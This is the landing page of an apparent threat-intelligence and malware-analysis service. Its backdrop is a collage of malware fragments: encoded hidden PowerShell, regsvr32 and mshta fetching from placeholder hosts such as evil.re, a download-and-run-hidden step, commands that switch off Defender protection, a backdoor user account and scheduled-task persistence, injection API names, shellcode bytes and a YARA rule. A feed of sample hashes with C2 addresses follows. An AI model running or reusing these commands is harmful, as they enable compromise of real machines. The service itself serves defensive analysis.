ZIP · DOCX · XLSX
OLE · CFB · Container
VBA Macro · P-Code
Base64 · XOR · Obfusc.
Shellcode · Loader
// MALICIOUS PAYLOAD
@echo off
cmd /c powershell -nop -w hidden
-enc JABzAD0ATgBlAHcALQBP...
certutil -decode drop.b64 out.exe
regsvr32 /s /n /u /i:http://c2.re
mshta http://evil.re/stage.hta
rule Malware_Dropper {
strings:
$mz = { 4D 5A ?? ?? }
$ps = "powershell" nocase
$b64 = /[A-Za-z0-9+\/]{40,}/
condition: all of them
}
50 4B 03 04 14 00 06 00
// ZIP magic — outer container
Set sh=CreateObject("WScript.Shell")
sh.Run "powershell -ep bypass",0,True
Set x=CreateObject("MSXML2.XMLHTTP")
x.Open "GET", strUrl, False
wscript //B //NoLogo drop.vbs
ShellExecuteA
WinExec
CreateProcessA
InternetOpenA
URLDownloadToFile
Function Deobf(s As String)
For i = 1 To Len(s)
r = r & Chr(Asc(Mid(s,i,1))
Xor &H41)
Next i : Deobf = r
End Function
Invoke-Expression $decoded
[Assembly]::Load($buf).EntryPoint
Add-MpPreference
-ExclusionPath
$env:APPDATA
Set-MpPreference
-DisableRealtime $true
...\CurrentVersion\Run
$b=[Convert]::FromBase64String(
"JABzAD0ATgBlAHcALQBPAGIA")
%COMSPEC:~0,1%%COMSPEC:~9,1%
Chr(112)&Chr(111)&Chr(119)
agBlAGMAdAAoACcAaAB0AHQA
cAB0ADoALwAvAGUAdgBpAGwA
cgBlAC4AcgBlAC8AcABhAHkA
XOR key: 0x41
ROT13 + base64
RC4 stream cipher
net user backdoor
P@ss1234! /add
schtasks /create
/sc minute /mo 5
\x48\x31\xC0\x48\xB8\x63\x61
\x6C\x63\x00\x50\xFF\xD0\x90
VirtualAllocEx
WriteProcessMemory
CreateRemoteThread
NtUnmapViewOfSection
GetProcAddress
LoadLibraryA
4D 5A 90 00 03 00 FF FF
0xfc,0x48,0x83,0xe4,0xf0,0xe8
0xcc,0x00,0x00,0x00,0x41,0x51
0x41,0x50,0x52,0x51,0x56,0x48
invoke-webrequest -uri $c2
-outfile $env:TEMP\svc32.exe
Start-Process -WindowStyle Hidden
AAAA%p%p%p%p%x.%x.%x
ZwQueryInformationProcess
// THREAT INTELLIGENCE PLATFORM
Unlock the future of
Extended Malware
Analysis.
Advanced static & structural analysis for cybersecurity experts.
200+
Formats
YARA
Rule Engine
AI
Powered
// Recent threats
18149ead55cb415131241b4ed5559f49
Portable Executable file
2 hours ago
8a4a309f70e140612f35124c6ecae3b7
PowerShell Script
3 hours ago
4021703b7529b7aadb335030f6c1400a
VBScript file
5 hours ago
8451a82ad37794f05153a70f9daa3d31
VBScript file
5 hours ago
210ed1422b45fb339f66b34c615412b0
VBScript file
5 hours ago
171a7aa59f860bd850791943151a0728
VBScript file
5 hours ago
f55a7200661a7d991a2a77376e8f844d
VBScript file
5 hours ago
bd83a5ea8bf29253f3dd3823d3c844bb
PowerShell Script
5 hours ago
2203b30b5bbe43987e64af68ebc44d1d
VBScript file
10 hours ago
9fce0558dd8b2061c7a8baf0877d5384
Portable Executable file
13 hours ago
8be48ea27f6cd6b2ec2ef3be4977322d
AutoIt Compiled Script
18 hours ago
15b622081c2b1e0696d3473d65f17b61
VBScript file
23 hours ago
d7e149f1ca913d1858ddabfdd1d99225
Portable Executable file
23 hours ago
XWorm
C2: 155.103.69.171
e37e997fdc8037551258f7174746b530
PowerShell Script
23 hours ago
e6f772f168e8db45fd160c44f00b0585
ZIP archive
23 hours ago
65a0a6674be30bc34f421cc5c5570eb4
ZIP archive
yesterday
f8325e6c42d5fa9a43ecfb5f77993b09
Portable Executable file
yesterday
AsyncRAT
C2: alienterprisess.co
1a4e059b2948df2c9c66454c7c59e9fe
PowerShell Script
yesterday
f2df2f2a607b9c03752b59c5444f16c9
Portable Executable file
yesterday
XWorm
C2: server.mailbox-joikqqyo.com
73bcd8d003f905f3ff029d977a97f05e
Portable Executable file
yesterday
Connect & explore more →
Sign in
New user?
Create an account →
Email address
Continue
or
Continue with Google
Continue with Microsoft
MALVA.RE · SECURE ACCESS · v2
An error has occurred. This application may no longer respond until reloaded.
Reload
🗙